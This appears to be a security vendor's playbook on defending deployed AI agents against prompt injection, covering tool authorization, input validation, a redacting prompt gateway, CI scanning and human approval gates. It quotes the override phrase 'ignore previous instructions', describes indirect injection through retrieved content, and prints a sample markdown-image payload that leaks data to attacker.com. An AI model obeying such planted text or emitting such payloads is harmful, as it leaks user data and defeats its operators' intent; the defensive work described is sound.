Prompt injection prevention: a production playbook

Last verified: June 2026· playbook

The threat model in one paragraph

Prompt injection is the AI-era version of SQL injection: an attacker controls part of the model's input and uses that control to act outside the intended trust boundary.

The threats you actually face, in 2026:

Direct prompt injection. A user types "ignore your previous instructions" in the chat. The model complies (or partially complies) and does something it shouldn't. The blast radius is the agent's tool access.
Indirect prompt injection. The model reads external content (a document, a Jira ticket, a Slack message, a web page) and that content contains instructions. The model follows them, not the user's instructions. The blast radius is whatever the agent can do with the content it has read.
Tool-mediated exfiltration. The agent calls an MCP tool — email, file write, database query — and uses that call to exfiltrate data or do something destructive. The blast radius is the tool's authority.
Data leakage via prompts. An engineer pastes a secret, PII, or proprietary data into a prompt. The model returns it, or a malicious user reads it via the same session, or it lands in a provider's training pipeline. The blast radius is the data's classification level.

Every one of these is a control problem, not a model problem. The fix is in the system around the model.

The four control layers (in order of impact)

The four control layers, in order of impact:

Tool authorization. Least-privilege credentials, read-only by default, audit log on every call, human approval gate on destructive actions. Most important.
Input validation. Treat every external input as untrusted. Strip instructions from retrieved docs. Cap tool result sizes. Validate URLs before fetching.
Prompt-data gateway. Redact PII / secrets before requests hit the model. Audit-log every prompt with the user, the route, and the redacted body.
AI-aware scanning in CI. Catch the leakage side of the same problem: hallucinated packages, missing tests, secrets in agent output, license violations.

If you only ship one, ship layer 1. If you ship all four, you've covered 90% of the realistic attack surface.

Layer 1: input validation and trust boundaries

The agent's input has three sources: the user's message, the conversation history, and the content the agent reads (RAG, MCP tool results, files in the repo). The first two are partially trusted (the user might be malicious). The third is untrusted.

Minimum viable input validation:

Strip instructions from retrieved content. If a retrieved RAG chunk starts with "ignore previous instructions and...", strip the instruction. A simple regex is enough for the obvious cases; a small classifier is better.
Cap tool result sizes. An MCP tool that returns 50,000 tokens of log lines is a vector for both context exhaustion and indirect injection. Cap at 2,000–4,000 tokens; summarize on the server side.
Validate URLs before fetching. The agent's web-browsing tool should reject internal network ranges (10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16) and localhost by default. SSRF is back.
Strip markdown images that exfiltrate via URL params. An indirect injection can plant ![](https://attacker.com/?leak=...) in a doc the agent reads; the model follows the URL on preview. Block external image previews in retrieved content.
Sandbox code execution. If the agent runs code (Python via Anthropic, Bash via shell MCP), the sandbox is a control surface. The agent's code runs in a network-restricted, time-limited, read-only-by-default environment.

None of these are model problems. All of them are system problems.

Layer 2: tool authorization (the most important control)

Tool authorization is the most important control. The agent's blast radius is bounded by the tools it can call, and the credentials those tools use.

Three rules for every MCP tool:

Least-privilege credentials. The agent has a service-account credential, scoped to the minimum the task needs, with no human-user authority. If the agent can do everything the on-call can, the prompt-injection blast radius is the production database.
Read-only by default. The first version of any tool is read-only. Write tools are added one at a time, deliberately, behind an audit log.
Audit log on every call. Who, what, when, with the request and the response. The log goes to the same observability stack as the rest of production. If you can't query it like a normal log, the log is not there.

The human-approval gate:

Destructive actions require explicit "yes" from a human. A "delete this row" or "send this email" or "deploy to production" tool cannot run without a human clicking "approve" in the agent's UI. The MCP spec supports this via permissions; Claude Code and Cursor both honor it.
Cost thresholds are gates. A "process all 10,000 records" tool should require approval if the cost exceeds a threshold (time, money, or both). Same mechanism.
Authorization is per-tool, not per-agent. A junior engineer's agent should not have the same tool authority as a senior engineer's agent. Tag tools to users / roles.

End state: every MCP tool has a credential, an audit log, a default of read-only, and a human-approval gate for high-impact actions.

Layer 3: a prompt-data gateway with audit logging

The prompt-data gateway is a single proxy through which all prompts pass. It does four things:

Redacts PII and secrets before the request hits the model. Email addresses, phone numbers, SSNs, API keys, connection strings — replaced with a placeholder that the model can use as a value but that doesn't leak the original.
Audit-logs every prompt with the user, the route, the model, the redacted prompt, and the response. The log goes to the same observability stack as the rest of production. The audit log is the incident-response artifact for "did the agent just leak something?".
Enforces per-user / per-team rate limits and cost budgets on the gateway. A user can't accidentally spend $20k in a day on a runaway agent loop.
Optionally filters retrieved content for instruction-like patterns before the agent sees it. The proxy sits between the agent and the model; the redacted prompt is what the model sees.

You can buy this (Maxim Bifrost, Portkey, Helicone with the redaction plugin) or build it (LiteLLM + a redaction middleware, or a thin layer in front of your existing LLM gateway). The implementation is less important than the policy: every prompt goes through the gateway, the gateway logs everything, the gateway redacts the obvious PII.

Layer 4: AI-aware scanning in CI

AI-aware scanning in CI is the leakage side of the same problem. The agent opens a PR; the PR contains the leak. The scanner catches it before merge.

The scanners:

AI-aware SAST (Snyk with AI rules, Semgrep with AI packs). Catches hallucinated package names, missing test files, suspicious imports, and the patterns of AI-generated code that differ subtly from human-written code.
Secret scanning in CI. AI agents occasionally paste real API keys from training data; standard secret scanners (gitleaks, TruffleHog) catch them.
License check. AI agents can suggest copyleft dependencies that the org's policy forbids.
A "this PR was opened by an agent" label, applied automatically. The reviewer knows to look more carefully. The metric: agent-opened PR rejection rate vs. human-opened PR rejection rate. They should converge by month 3.

The scanner is the cleanup; layers 1–3 are the prevention. Both matter.

When to put a human in the loop

The right time to put a human in the loop is when the agent's action has a non-reversible, high-blast-radius consequence. The wrong time is for every action.

Human-gate by default:

Anything that mutates state outside the agent's normal authority (delete, deploy, send, pay)
Anything that crosses a data classification boundary (internal → external)
Anything that costs more than a per-action budget (time, money, tokens)
Anything the agent's confidence is below a threshold on

Human-in-the-loop-by-default gets gamed (the human rubber-stamps). The pattern that works is: most actions are autonomous, the rare high-impact ones are gated. The agent should be doing 100 actions an hour autonomously, with a human checking 1–2 per day for review.

A 3-week rollout plan

A 3-week rollout for the full control set:

Week 1: tool authorization baseline. Audit every MCP server in production. Read-only by default, scoped credentials, audit log. Ship a single dashboard that shows the tool's authority per agent. This is the highest-leverage week; do it first.
Week 2: prompt-data gateway. Stand up the gateway in front of the LLM API. PII redaction, audit log, rate limits. Wire it into every Claude Code, Cursor, and Copilot integration. The redaction is the part that matters for compliance; the audit log is the part that matters for incident response.
Week 3: AI-aware scanning + input validation. Add the scanners to CI. Add input validation to the MCP tools. Add the human-approval gate for destructive actions. The scanners are the cleanup; the input validation is the prevention.

End of week 3: every MCP tool has a credential, a scope, an audit log, a default of read-only, and a human-approval gate. Every prompt goes through a gateway that redacts PII and logs the request. Every PR opened by an agent runs through a scanner that catches hallucinated packages and secrets. Every external input is treated as untrusted.

This is 90% of the realistic attack surface. The remaining 10% is model-level (jailbreak resistance) and is the part the model providers are working on; you don't need to solve it.

Do this yourself vs hire us

When to do this yourself, when to hire:

Do this yourself if…

You have a security engineer who can write a thin proxy in front of your LLM API in a week
Your MCP tool surface is small (≤3 servers) and you can audit them in a week
Your CI already runs SAST + secret scanning; you can add the AI-aware rules yourself
You have a clear threat model and an exec sponsor for the rollout

Hire us if…

You have 5+ MCP servers in production and want the authorization audit done in a week, not a quarter
You need the prompt-data gateway wired into Claude Code, Cursor, and Copilot across 30+ engineers
You need the AI-aware SAST + secret scanning in CI by next week (compliance deadline)
You don't have a senior engineer who has shipped a redaction / proxy / scan stack in production
You want this delivered while your security team keeps the rest of their queue

Frequently asked questions

What is the difference between prompt injection and jailbreaking?

Jailbreaking is convincing the model to bypass its own safety training (output side). Prompt injection is convincing the model to bypass the developer's intent (input side, control the model's behavior). The defenses are different: jailbreaking is a model-provider problem; prompt injection is a system problem (input validation, tool authorization, audit logs).

Can I just use a "system prompt" to prevent prompt injection?

No. System prompts are user-visible to the model and to anyone who controls the model's input. A sufficiently clever prompt-injection payload can override a system prompt. The defense is the system around the model, not the prompt itself.

What is the most important control?

Tool authorization. The blast radius of a prompt-injection attack is bounded by what the agent can do. Read-only MCP tools, scoped credentials, and human approval gates on destructive actions reduce the worst-case from "delete the production database" to "produce a bad answer".

Do I need to train my own model to be safe from prompt injection?

No. The defenses are system-level, not model-level. A well-instrumented agent with read-only tools and a human approval gate on destructive actions is safe even if the underlying model is jailbreakable.

How long does the rollout take?

A focused 3-week engagement covers: the tool authorization audit, the prompt-data gateway, the AI-aware scanning, and the input validation. Most teams ship layer 1 in week 1 and layer 2 in week 2.